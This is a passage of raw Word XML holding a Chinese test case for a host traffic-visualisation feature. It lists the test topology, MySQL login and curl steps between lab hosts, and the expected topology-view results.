                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>UASS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>SSMC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Redhat-67-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>两台主机加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>加入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>一台未安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>的主机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cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>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cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>执行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">mysql  -u root -p -h </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）,输入正确密码登录</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Redhat-67-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>执行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">mysql  -u root -p -h </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>输入正确密码登录</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Redhat-67-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>执行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>:8080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在未安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>的主机执行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>:8080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>登录服务端，查看流量可视化图；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cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>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ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：可通过业务拓扑图，查看到不同业务组之间的访问关系，可查看到四条流量线。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：可在拓扑图中，点击</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，查看主机基本信息，包含：所属业务组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、主机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、监听的协议端口（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>tcp:80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>：可通过点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Redhat-67-01两台主机之间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>的流量线，查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>的基本信息、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Redhat-67-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>的基本信息、访问的协议端口（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>tcp:3306</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）、访问的服务（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）、访问计数（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>次）、首次访问时间、最近访问时间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cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>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cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>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cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>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eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
